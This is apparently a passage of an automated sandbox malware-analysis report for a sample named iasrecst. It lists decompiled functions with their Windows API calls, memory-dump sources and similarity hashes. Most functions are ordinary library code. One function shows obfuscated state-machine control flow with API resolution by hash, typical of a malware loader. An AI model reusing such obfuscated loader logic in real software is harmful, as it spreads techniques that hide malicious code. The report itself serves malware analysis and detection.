					if( *((intOrPtr*)(_t134 + 0x70)) != 0) {
						E0041D609(_t120, _t153, _t134, 0xffffffff, 0);
					}
					 *((intOrPtr*)(_t134 + 0x70)) = _t109;
					_t79 = E004225AA(_t109, _t153);
					 *(_t79 + 0xb8) =  *(_t79 + 0xb8) | 0x0000000c;
					return _t79;
				}
				if(_a8 != 0) {
					_t61 = EqualRect( &_v36, _a8);
					if(_t61 == 0) {
						goto L3;
					}
				}
				return _t61;
			}

APIs

GetWindowRect.USER32 ref: 0041D3D9
EqualRect.USER32 ref: 0041D3F5
GetDlgCtrlID.USER32 ref: 0041D476
CopyRect.USER32 ref: 0041D4A3
GetParent.USER32(?), ref: 0041D554
SetParent.USER32(?,?), ref: 0041D573

Strings

@, xrefs: 0041D40F

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Rect$Parent$CopyCtrlEqualWindow
String ID: @
API String ID: 3581194824-2766056989
Opcode ID: 2ea802bbfde414efe59f16374f298989db8c13d0e5b755017994176e5bba3002
Instruction ID: 8366d14a4fbab590a3c5e893c5bf745e495171ad1a8ef82a64abe53d0d133945
Opcode Fuzzy Hash: 2ea802bbfde414efe59f16374f298989db8c13d0e5b755017994176e5bba3002
Instruction Fuzzy Hash: 88518FB1A00615ABDF14DF69CC85AEE77AAEB44308F00452AE912D72A1DB38E985CB54

Uniqueness

Uniqueness Score: -1.00%

Function 022C9FC8, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E022C9FC8(void* __eax, void* __ebx, void* __ebp, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36, char _a40, char _a44, intOrPtr _a48, char _a56, char _a576) {
				intOrPtr* _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t37;
				signed int _t38;
				intOrPtr* _t41;
				signed int _t44;
				intOrPtr* _t47;
				intOrPtr* _t49;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				intOrPtr* _t66;
				intOrPtr _t70;
				intOrPtr* _t71;
				intOrPtr* _t75;
				signed int _t76;
				signed int _t82;
				intOrPtr* _t95;
				intOrPtr _t98;
				char* _t100;
				intOrPtr _t101;
				intOrPtr _t134;
				intOrPtr* _t146;
				void* _t148;
				intOrPtr _t149;
				void* _t150;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t156;
				char* _t157;
				void* _t158;
				char _t161;
				intOrPtr _t165;
				void* _t166;
				void* _t170;
				void* _t171;

				_t37 = __eax;
				goto L3;
				do {
					while(1) {
						L3:
						_t170 = _t37 - 0x1bec2acf;
						if(_t170 > 0) {
							goto L41;
						}
						L4:
						if(_t170 == 0) {
							_t54 =  *0x22cdea8;
							__eflags = _t54;
							if(_t54 == 0) {
								_t100 = E022C3F20(0xbb398380);
								_t54 = E022C3E80(_t95, _t100, 0x97f883e, _t161);
								 *0x22cdea8 = _t54;
							}
							_t148 =  *_t54();
							_t56 =  *0x22ce1a0;
							__eflags = _t56;
							if(_t56 == 0) {
								_t100 = E022C3F20(0xbb398380);
								_t56 = E022C3E80(_t95, _t100, 0x26c3f343, _t161);
								 *0x22ce1a0 = _t56;
							}
							 *_t56(_t148, 0, _t95);
							_t149 = _a12;
							_t37 = 0x1dedf83c;
							continue;
						} else {
							_t171 = _t37 - 0x191840a9;
							if(_t171 > 0) {
								__eflags = _t37 - 0x1a29c84b;
								if(_t37 == 0x1a29c84b) {
									_t60 =  *0x22cdea8;
									__eflags = _t60;
									if(_t60 == 0) {
										_t100 = E022C3F20(0xbb398380);
										_t60 = E022C3E80(_t95, _t100, 0x97f883e, _t161);
										 *0x22cdea8 = _t60;
									}
									_t150 =  *_t60();
									_t62 =  *0x22cdcec;
									__eflags = _t62;
									if(_t62 == 0) {
										_t100 = E022C3F20(0xbb398380);
										_t62 = E022C3E80(_t95, _t100, 0xe9233692, _t161);
										 *0x22cdcec = _t62;
									}
									_t53 =  *_t62(_t150, 8, 0x48);
									_a16 = _t53;
									__eflags = _t53;
									if(_t53 == 0) {
										L59:
										return _t53;
									} else {
										_t149 = _a12;
										_t37 = 0x1fc710ef;
										continue;
									}
								} else {
									__eflags = _t37 - 0x1a44b2a5;
									if(_t37 != 0x1a44b2a5) {
										break;
									} else {
										_t157 = E022C34C0(0x22cda50);
										_t66 =  *0x22cdc60;
										__eflags = _t66;
										if(_t66 == 0) {
											_t66 = E022C3E80(_t95, E022C3F20(0xe66945e6), 0xcca28b0d, _t161);
											 *0x22cdc60 = _t66;
										}
										 *_t66( &_a56, 0x104, _t157,  &_a576, _t95);
										_t166 = _t166 + 0x14;
										_t100 = _t157;
										E022C3460(_t100);
										_t149 = _a24;
										_t37 = 0x10f8a433;
										continue;
									}
								}
							} else {
								if(_t171 == 0) {
									_t101 = _a28;
									 *((intOrPtr*)(_t101 + 0x24)) = _t149;
									_t70 =  *0x22ce2dc; // 0x0
									 *((intOrPtr*)(_t101 + 0x20)) = _t70;
									 *0x22ce2dc = _t101;
									return _t70;
								} else {
									if(_t37 == 0xa70e03e) {
										_t71 =  *0x22cdc70;
										__eflags = _t71;
										if(_t71 == 0) {
											_t100 = E022C3F20(0xbb398380);
											_t71 = E022C3E80(_t95, _t100, 0x560d239b, _t161);
											 *0x22cdc70 = _t71;
										}
										 *_t71(_a44);
										_t37 = 0x191840a9;
										continue;
									} else {
										if(_t37 == 0x10f8a433) {
											_push(0);
											_push(_t100);
											_t100 = 0;
											E022C4BA0(_t95, 0,  &_a56, _t161, 1);
											_t166 = _t166 + 0xc;
											_t37 = 0x1bec2acf;
											continue;
										} else {
											if(_t37 != 0x18d473c5) {
												break;
											} else {
												_t154 =  *0x22ce2ec; // 0x7720d0
												_t75 =  *0x22ce024;
												_t155 = _t154 + 0x278;
												_a48 = _t155;
												if(_t75 == 0) {
													_t100 = E022C3F20(0xbb398380);
													_t75 = E022C3E80(_t95, _t100, 0x5262aefc, _t161);
													 *0x22ce024 = _t75;
												}
												_t76 =  *_t75(_t155);
												_t156 =  *0x22cded0;
												_a48 = 2 + _t76 * 2;
												if(_t156 == 0) {
													_t100 = E022C3F20(0xbb398380);
													_t156 = E022C3E80(_t95, _t100, 0x23563937, _t161);
													 *0x22cded0 = _t156;
												}
												_t165 = _t156;
												if(_t156 == 0) {
													_t100 = E022C3F20(0xbb398380);
													_t156 = E022C3E80(_t95, _t100, 0x23563937, _t165);
													 *0x22cded0 = _t156;
												}
												_t98 = _t156;
												if(_t156 == 0) {
													_t100 = E022C3F20(0xbb398380);
													 *0x22cded0 = E022C3E80(_t98, _t100, 0x23563937, _t165);
												}
												_t146 =  *0x22cdce8; // 0x0
												if(_t146 == 0) {
													_t100 = E022C3F20(0xbb398380);
													_t146 = E022C3E80(_t98, _t100, 0xb310a228, _t165);
													 *0x22cdce8 = _t146;
												}
												_t82 =  *_t146(GetCurrentProcess(), GetCurrentProcess(), GetCurrentProcess(),  &_a40, 0x100000, 1, 0);
												_t149 = _v8;
												_t134 = _v12;
												asm("sbb eax, eax");
												_t37 = ( ~_t82 & 0x069deb97) + 0x1f9eb481;
												_t95 = _v0;
												L2:
												_t161 = _a36;
												while(1) {
													L3:
													_t170 = _t37 - 0x1bec2acf;
													if(_t170 > 0) {
														goto L41;
													}
													goto L4;
												}
												goto L41;
											}
										}
									}
								}
							}
						}
						L60:
						L41:
						__eflags = _t37 - 0x1fc710ef;
						if(__eflags > 0) {
							__eflags = _t37 - 0x263ca018;
							if(_t37 == 0x263ca018) {
								_t100 =  &_a44;
								_t38 = E022CB3A0(_t100,  &_a36);
								asm("sbb eax, eax");
								_t37 = ( ~_t38 & 0x28f9ad68) + 0xa70e03e;
								goto L2;
							} else {
								__eflags = _t37 - 0x336a8da6;
								if(_t37 != 0x336a8da6) {
									break;
								} else {
									_t100 = _t161;
									_t41 = E022C1140(_a40);
									_t134 = _a20;
									_t95 = _t41;
									__eflags = _t95;
									_a32 = _t95;
									_t37 =  !=  ? 0x1a44b2a5 : 0x1dedf83c;
									continue;
								}
							}
						} else {
							if(__eflags == 0) {
								_t100 = _t149;
								_t44 = E022CAB50(_t100, _t134,  &_a576);
								_t134 = _a20;
								_t166 = _t166 + 4;
								asm("sbb eax, eax");
								_t37 = ( ~_t44 & 0xf935bf44) + 0x1f9eb481;
								continue;
							} else {
								__eflags = _t37 - 0x1dedf83c;
								if(_t37 == 0x1dedf83c) {
									_t47 =  *0x22cdea8;
									__eflags = _t47;
									if(_t47 == 0) {
										_t100 = E022C3F20(0xbb398380);
										_t47 = E022C3E80(_t95, _t100, 0x97f883e, _t161);
										 *0x22cdea8 = _t47;
									}
									_t158 =  *_t47();
									_t49 =  *0x22ce1a0;
									__eflags = _t49;
									if(_t49 == 0) {
										_t100 = E022C3F20(0xbb398380);
										_t49 = E022C3E80(_t95, _t100, 0x26c3f343, _t161);
										 *0x22ce1a0 = _t49;
									}
									 *_t49(_t158, 0, _t161);
									_t149 = _a12;
									_t37 = 0xa70e03e;
									_t134 = _a8;
									continue;
								} else {
									__eflags = _t37 - 0x1f9eb481;
									if(_t37 == 0x1f9eb481) {
										_t53 = E022C4250(_t95, _a28);
										goto L59;
									} else {
										break;
									}
								}
							}
						}
						goto L60;
					}
					__eflags = _t37 - 0x1c40b504;
				} while (_t37 != 0x1c40b504);
				return _t37;
				goto L60;
			}

0x022c9fc8
0x022c9fc8
0x022c9fd0
0x022c9fd0
0x022c9fd0
0x022c9fd0
0x022c9fd5
0x00000000
0x00000000
0x022c9fdb
0x022c9fdb
0x022ca25f
0x022ca264
0x022ca266
0x022ca277
0x022ca279
0x022ca27e
0x022ca27e
0x022ca285
0x022ca287
0x022ca28c
0x022ca28e
0x022ca29f
0x022ca2a1
0x022ca2a6
0x022ca2a6
0x022ca2af
0x022ca2b1
0x022ca2b5
0x00000000
0x022c9fe1
0x022c9fe1
0x022c9fe6
0x022ca17a
0x022ca17f
0x022ca1ee
0x022ca1f3
0x022ca1f5
0x022ca206
0x022ca208
0x022ca20d
0x022ca20d
0x022ca214
0x022ca216
0x022ca21b
0x022ca21d
0x022ca22e
0x022ca230
0x022ca235
0x022ca235
0x022ca23f
0x022ca241
0x022ca245
0x022ca247
0x022ca40c
0x022ca416
0x022ca24d
0x022ca24d
0x022ca251
0x00000000
0x022ca256
0x022ca181
0x022ca181
0x022ca186
0x00000000
0x022ca18c
0x022ca196
0x022ca198
0x022ca19d
0x022ca19f
0x022ca1b2
0x022ca1b7
0x022ca1b7
0x022ca1d0
0x022ca1d2
0x022ca1d5
0x022ca1d7
0x022ca1dc
0x022ca1e0
0x00000000
0x022ca1e5
0x022ca186
0x022c9fec
0x022c9fec
0x022ca3e3
0x022ca3e7
0x022ca3ea
0x022ca3ef
0x022ca3f2
0x022ca402
0x022c9ff2
0x022c9ff7
0x022ca142
0x022ca147
0x022ca149
0x022ca15a
0x022ca15c
0x022ca161
0x022ca161
0x022ca16a
0x022ca170
0x00000000
0x022c9ffd
0x022ca002
0x022ca121
0x022ca123
0x022ca12a
0x022ca12c
0x022ca135
0x022ca138
0x00000000
0x022ca008
0x022ca00d
0x00000000
0x022ca013
0x022ca013
0x022ca019
0x022ca01e
0x022ca024
0x022ca02a
0x022ca03b
0x022ca03d
0x022ca042
0x022ca042
0x022ca048
0x022ca04a
0x022ca057
0x022ca05d
0x022ca06e
0x022ca075
0x022ca077
0x022ca077
0x022ca07d
0x022ca081
0x022ca092
0x022ca099
0x022ca09b
0x022ca09b
0x022ca0a1
0x022ca0a5
0x022ca0b6
0x022ca0bf
0x022ca0bf
0x022ca0c5
0x022ca0cd
0x022ca0de
0x022ca0e5
0x022ca0e7
0x022ca0e7
0x022ca104
0x022ca106
0x022ca10c
0x022ca110
0x022ca117
0x022c9fb9
0x022c9fc2
0x022c9fc2
0x022c9fd0
0x022c9fd0
0x022c9fd0
0x022c9fd5
0x00000000
0x00000000
0x00000000
0x022c9fd5
0x00000000
0x022c9fd0
0x022ca00d
0x022ca002
0x022c9ff7
0x022c9fec
0x022c9fe6
0x00000000
0x022ca2c3
0x022ca2c3
0x022ca2c8
0x022ca389
0x022ca38e
0x022ca3c3
0x022ca3c7
0x022ca3d2
0x022ca3d9
0x00000000
0x022ca390
0x022ca390
0x022ca395
0x00000000
0x022ca39b
0x022ca39f
0x022ca3a1
0x022ca3a6
0x022ca3aa
0x022ca3ac
0x022ca3ae
0x022ca3b7
0x00000000
0x022ca3b7
0x022ca395
0x022ca2ce
0x022ca2ce
0x022ca367
0x022ca36a
0x022ca36f
0x022ca373
0x022ca378
0x022ca37f
0x00000000
0x022ca2d4
0x022ca2d4
0x022ca2d9
0x022ca2fc
0x022ca301
0x022ca303
0x022ca314
0x022ca316
0x022ca31b
0x022ca31b
0x022ca322
0x022ca324
0x022ca329
0x022ca32b
0x022ca33c
0x022ca33e
0x022ca343
0x022ca343
0x022ca34c
0x022ca34e
0x022ca352
0x022ca357
0x00000000
0x022ca2db
0x022ca2db
0x022ca2e0
0x022ca407
0x00000000
0x00000000
0x00000000
0x00000000
0x022ca2e0
0x022ca2d9
0x022ca2ce
0x00000000
0x022ca2c8
0x022ca2e6
0x022ca2e6
0x022ca2fb
0x00000000

APIs

GetCurrentProcess.KERNEL32(?,00100000,00000001,00000000), ref: 022CA0FB
GetCurrentProcess.KERNEL32(00000000), ref: 022CA0FE
GetCurrentProcess.KERNEL32(00000000), ref: 022CA101

Strings

>p, xrefs: 022C9FF2
79V#, xrefs: 022CA069
79V#, xrefs: 022CA08D
79V#, xrefs: 022CA0B1

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: 79V#$79V#$79V#$>p
API String ID: 2050909247-2830606539
Opcode ID: 034f60b0e0ac1bad9d7abcc5a44e51da79095170f242a9a1672018f7e3813f14
Instruction ID: 798f9db0e8fe149eb02a99a5a6c6fe17fed86ee14dc9c53c9203f55d1050ba4a
Opcode Fuzzy Hash: 034f60b0e0ac1bad9d7abcc5a44e51da79095170f242a9a1672018f7e3813f14
Instruction Fuzzy Hash: 1331D271E213559BCB10DEE4A44876E32D7AB84794F384E5DE481DB318DE75CC008BC2

Uniqueness

Uniqueness Score: -1.00%

Function 022814A0, Relevance: 12.2, APIs: 8, Instructions: 171COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 022814DB
SetLastError.KERNEL32(0000007F), ref: 02281507

Memory Dump Source

Source File: 00000001.00000002.496560392.0000000002281000.00000020.00000001.sdmp, Offset: 02281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2281000_iasrecst.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 980114e2a7d37594ccd30b984f243ded2fa260d9265ed0fe4f0f98de12b75274
Instruction ID: 3fdefe74b830a164648bf9eefdaf53f3f69291952b975e84d91e8267b0025df1
Opcode Fuzzy Hash: 980114e2a7d37594ccd30b984f243ded2fa260d9265ed0fe4f0f98de12b75274
Instruction Fuzzy Hash: 42710774E1110ADFDB08DF94C580BADB7B2FF48304F248598D54AAB385C774EA92CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00409509, Relevance: 12.1, APIs: 8, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409509() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x439ed4; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = E00405667(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E00405700(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = E00405667(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										E004062E0(_v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x439ed4 = 2;
					goto L18;
				}
				 *0x439ed4 = 1;
				goto L6;
			}

APIs

GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 00409524
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 00409538
GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 00409564
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040641E), ref: 0040959C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040641E), ref: 004095BE
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,0040641E), ref: 004095D7
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 004095EA
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00409628

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: c300a98435790b0a112db5af198a1087b81f0d641cfac9594a12296cbced713a
Instruction ID: ef1768683ce44c7a55569678311ee6e18f6548819425519884899f5cccb4810e
Opcode Fuzzy Hash: c300a98435790b0a112db5af198a1087b81f0d641cfac9594a12296cbced713a
Instruction Fuzzy Hash: 023142B35052147FD7313F765C9483BB79CE649358B59093BF482E32C2EA3A8C4286AD

Uniqueness

Uniqueness Score: -1.00%

Function 0041518D, Relevance: 12.1, APIs: 8, Instructions: 120
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041518D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct tagRECT* _a20, intOrPtr _a24, intOrPtr _a28) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagRECT _v36;
				void* _v40;
				void* __ebp;
				int _t56;
				intOrPtr* _t57;
				signed short _t62;
				void* _t63;
				void* _t67;
				intOrPtr* _t80;
				signed int _t83;
				struct HWND__* _t86;
				void* _t87;

				_t67 = __ecx;
				_v8 = 0;
				_v12 = _a28;
				_v16 = 0;
				_v20 = 0;
				if(_a24 == 0) {
					GetClientRect( *(__ecx + 0x1c),  &_v36);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(_a16 == 1) {
					_v40 = _v40 & 0x00000000;
				} else {
					_v40 = BeginDeferWindowPos(8);
				}
				_t56 = GetTopWindow( *(_t67 + 0x1c));
				_t86 = _t56;
				while(_t86 != 0) {
					_t62 = GetDlgCtrlID(_t86);
					_push(_t86);
					_t83 = _t62 & 0x0000ffff;
					_t63 = E00413767();
					if(_t83 != _a12) {
						if(_t83 >= _a4 && _t83 <= _a8 && _t63 != 0) {
							SendMessageA(_t86, 0x361, 0,  &_v40);
						}
					} else {
						_v8 = _t86;
					}
					_t56 = GetWindow(_t86, 2);
					_t86 = _t56;
				}
				if(_a16 != 1) {
					if(_a12 != 0 && _v8 != 0) {
						_t57 = E00413740(_t87, _v8);
						if(_a16 == 2) {
							_t80 = _a20;
							_v36.left = _v36.left +  *_t80;
							_v36.top = _v36.top +  *((intOrPtr*)(_t80 + 4));
							_v36.right = _v36.right -  *((intOrPtr*)(_t80 + 8));
							_v36.bottom = _v36.bottom -  *((intOrPtr*)(_t80 + 0xc));
						}
						 *((intOrPtr*)( *_t57 + 0x60))( &_v36, 0);
						_t56 = E004152C7( &_v40, _v8,  &_v36);
					}
					if(_v40 != 0) {
						_t56 = EndDeferWindowPos(_v40);
					}
				} else {
					if(_a28 == 0) {
						_t56 = _a20;
						 *((intOrPtr*)(_t56 + 8)) = _v20;
						 *((intOrPtr*)(_t56 + 4)) = 0;
						 *_t56 = 0;
						 *((intOrPtr*)(_t56 + 0xc)) = _v16;
					} else {
						_t56 = CopyRect(_a20,  &_v36);
					}
				}
				return _t56;
			}

APIs

GetClientRect.USER32 ref: 004151C0
BeginDeferWindowPos.USER32 ref: 004151CE
GetTopWindow.USER32(?), ref: 004151E0
GetDlgCtrlID.USER32 ref: 004151EF
SendMessageA.USER32 ref: 00415221
GetWindow.USER32(00000000,00000002), ref: 0041522A
CopyRect.USER32 ref: 00415246

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Window$Rect$BeginClientCopyCtrlDeferMessageSend
String ID:
API String ID: 3332788312-0
Opcode ID: e0fe07f5cd80bbe5b935e70b31fd5524e2a365d3d0350172d4ba8dcbf9d76f28
Instruction ID: 90a1176f2728ed92b7e018f664d1b63403b8a41a4a5cc89754fcf96d7c9d9e63
Opcode Fuzzy Hash: e0fe07f5cd80bbe5b935e70b31fd5524e2a365d3d0350172d4ba8dcbf9d76f28
Instruction Fuzzy Hash: D8418D72D00609EFCF15DF94D8848EEB7B5FF49304B1480AAE901A7251C738AE81CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041264E, Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041264E(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x98);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x94);
							if( *(_t35 + 0x94) != 0) {
								E0041A92B(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x94) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E0041A92B( *(_t35 + 0x94));
								 *(_t35 + 0x94) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

APIs

GlobalLock.KERNEL32 ref: 0041266E
lstrcmpA.KERNEL32(?,?), ref: 0041267A
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 0041268C
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004126AF
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004126B7
GlobalLock.KERNEL32 ref: 004126C4
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 004126D1
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 004126EF

Part of subcall function 0041A92B: GlobalFlags.KERNEL32(?), ref: 0041A935
Part of subcall function 0041A92B: GlobalUnlock.KERNEL32(?,?,?,0042421F,?,?,?,?,0040199F,00437BE8,?,004013A2), ref: 0041A94C
Part of subcall function 0041A92B: GlobalFree.KERNEL32 ref: 0041A957

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 0d019d4b2acfde511ffeb0843ccef9a7e3a2d5da595c8f22555f1064e6ac44b4
Instruction ID: e892e9459afc7c616b27fd268aebf896f546ff29830f707e5cbc297c1b476139
Opcode Fuzzy Hash: 0d019d4b2acfde511ffeb0843ccef9a7e3a2d5da595c8f22555f1064e6ac44b4
Instruction Fuzzy Hash: 4011E771200104BEDB21AB76CD4AEAF7BBDEF85704F00042EF608D1152D7799DA1D728

Uniqueness

Uniqueness Score: -1.00%

Function 0042322D, Relevance: 12.1, APIs: 8, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0042322D(intOrPtr __ecx) {
				int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				intOrPtr _t24;
				intOrPtr _t26;
				int _t35;
				long _t39;
				intOrPtr _t40;
				int _t42;
				void* _t43;

				_v12 = __ecx;
				_v8 = GetSystemMetrics(6);
				_t39 = GetSystemMetrics(5);
				_t35 = GetSystemMetrics(0x21);
				_t42 = GetSystemMetrics(0x20);
				_v28.top = _v8;
				_t24 =  *0x439c98; // 0x0
				_v28.left = _t39;
				_v28.right = _t24 - _t39;
				_t26 =  *0x439c9c; // 0x0
				_v28.bottom = _t26;
				if((E00416528(_v12) & 0x00040600) != 0) {
					OffsetRect( &_v28, _t42 - _t39, _t35 - _v8);
				}
				_t40 = _v12;
				_push(GetWindowDC( *(_t40 + 0x1c)));
				_t43 = E00419BA2();
				InvertRect( *(_t43 + 4),  &_v28);
				return ReleaseDC( *(_t40 + 0x1c),  *(_t43 + 4));
			}

APIs

GetSystemMetrics.USER32 ref: 00423241
GetSystemMetrics.USER32 ref: 00423248
GetSystemMetrics.USER32 ref: 0042324E
GetSystemMetrics.USER32 ref: 00423254

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

OffsetRect.USER32(?,00000000,?), ref: 0042328D
GetWindowDC.USER32(?,?,?,?), ref: 00423299
InvertRect.USER32(?,?), ref: 004232AE
ReleaseDC.USER32 ref: 004232BA

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
